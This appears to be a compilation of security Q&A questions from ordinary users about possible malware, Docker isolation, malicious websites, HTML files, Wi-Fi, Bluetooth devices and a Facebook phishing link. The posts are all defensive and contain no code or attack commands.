Possible Malicious Linux.Xor.DDoS installed

I am not an expert in information security. I am running Lubuntu on a laptop. Today, I ran chkrootkit and it printed the following:

INFECTED: Possible Malicious Linux.Xor.DDoS installed /tmp/clamav-71d2ee99f7e011424ab238571d720a88.tmp 

I did run clamscan. This is the first time I have seen this notice. I could not find any other reporting on it. Is this a known false positive, or does it represent a genuine intrusion — and if it is the latter, is the proper response to just go in and delete that .tmp file?

Can malicious applications running inside a docker container still be harmful?

I am very new to docker (and don’t usually program at a ‘systems’ level). I will be working on an open source project with complete strangers over the web over the next couple of months. I trust them, but I like to not have to trust people (meant in the best possible way).

I would like to know, if I download various repositories from github or elsewhere, and run them inside a docker container, is it possible for them to cause harm to my laptop in any way?

In case it’s relevant, the repositories will mostly be web applications (think django, node), and will likely use databases (postgres etc), and otherwise operate as regular locally hosted web applications. It is possible (like anything from github or the world wide web), that some apps could contain malicious code. I am curious to know if running such an app (containing malicious code) inside a docker container prevents that code from harming anything outside of the docker container (i.e. my laptop)?

What can a malicious website do in the worst case on an upgraded system [closed]

I use the latest Debian stable (buster, as of June 2020).

  • system upgraded every day (and browser add-ons updated automatically)
  • Firefox 68.9.0esr (64-bit) (the one from the apt package system)
  • decent hardware (less than 5 years old)
  • Debian security upgrade enabled

I’m aware of security concerns, I…

  • verify (before clicking an HTTP link) whether a link that looks like example.org is in fact, for example, example.org.random.tracker.io (I am careful about phishing and tracking)
  • take care with untrusted X509 certificates for https websites
  • avoid using untrusted Firefox add-ons
  • never open suspicious files from the web or from emails
  • don’t use weak passwords (and I don’t use the same one on 2 websites)
  • never run Firefox as root (who does this?)
  • use httpsEverywhere, uBlock-Origin, Ghostery, Decentraleyes Firefox addons

So my question:

  • what is the risk of opening a malicious website (if it is not in the Google Safe Browsing DB)? What can it do, in the worst case, apart from being a phishing website? (I guess crypto-mining at least, or exploiting a Firefox vulnerability…)

Attacking through a malicious HTML file apart from XSS through Javascript

I recently came across a behavior in a web application where the application (through the use of the header ‘Content-Disposition: attachment’) offers to download an HTML file instead of allowing it to get parsed by the browser. Interestingly, the GET request to the URL that lets you download the HTML page passes the absolute path of the HTML file that will be downloaded – starting all the way from /usr/local....<snip>/public/mypage.html . If an attacker has the privilege to upload an HTML file to this location (public), apart from an XSS attack, what else can he/she do on the machine of a victim who downloads and opens the HTML file crafted by the attacker?

I am aware of the XSS attacks that one can carry out by injecting some malicious JavaScript into the HTML file. I would like to know what else an attacker can get done outside of JavaScript XSS attacks.

Can the headphone or earbud (Bluetooth or wired) transmit malicious code, virus, Trojan or any kind of malware from computer to computer?

I have an old computer and I am sure it has a Trojan or malicious code on it. After that I bought a new one. The problem is that I did not change my old headphones that I used with my old computer, and I plugged them into the new computer. Is there any problem with using my old headphones? Thank you.

How do I go about decoding this malicious PHP script? [duplicate]

I came upon this script just by luck, actually. Ironically, it’s stored in a protected folder on my website and I don’t think


How to stop malicious WIFI from doing (whatever it wants to do)?

I was reading this: How to check if a Wi-Fi network is safe to connect to?

when I came across some comments:

I can redirect you to other pages without your interaction. Install key loggers. Heck if your browser runs activeX objects I could open a shell on your machine without your knowledge. That last example is rare these days but what’s not rare is tricking you into installing a shell for me, keylogging, session stealing, and redirection.

Or as I mentioned in my post, drop a crypto miner on your machine with the tool I wrote

Written by Anthony Russell in the comments of his answer.

So, this looks bad, obviously. What I want to know is how can I stop these attacks? Blocking JavaScript sounds like a good start; the original post also suggested checking my device for open ports (they did not demonstrate how to shut them, though). What else? Is there a fool-proof way to prevent these sorts of (virus injection? remote control?) attacks? I am not talking about logging, though. That’s a given when you connect to any network.

What I’m most worried about is virus injection. But other attacks (like key loggers) mentioned above are concerns too. Just share whatever comes to mind. I’m sure other people will fill in the blanks.

Sorry if I sound like a complete noob. That’s because I am. Sorry in advance.

Can a malicious WIFI network force a connection

Say I enter a place with public WIFI. Of course, I would not connect to the network since I know it’s risky, but I do have my computer turned on. Can an attacker know my computer is there and force a connection to it? If they were able to do so, then my precaution is wasted, and any attacks a malicious network could do would be done.

Telling me whether this could be done and how to stop it would be very helpful, thanks.

As a sidenote, connecting to a known network may not be safe either, could hackers “replace” an existing network with a malicious network with the same name? If so, how to protect myself against it?

Can Bluetooth “headphones” be malicious?

I received a parcel from Amazon which I did not order, addressed to me. It contained Bluetooth earphones. It may just be part of a brushing scam, but it’s got me curious.

So my question is: could a Bluetooth device be disguised as earphones and actually contain malware?

When attempting to connect my phone it appears as an audio device but prompts me to “Allow access to contacts and call history”.

Is “brizy dot site” a known malicious website?

I got a Facebook message from a friend, with a link to a supposed YouTube video, but instead it was pointing to plum1998318 dot brizy dot site.

Then I noticed that someone posted on this friend’s Facebook wall that he got a message, clicked on the link in it, and some hackers stole his password and sent everyone a copy of that same message.

My friend didn’t send that message (not on purpose).

It seems that this malware propagates by sending Facebook messages.

Is it enough if he changes Facebook and YouTube passwords? Or did his computer get infected as well?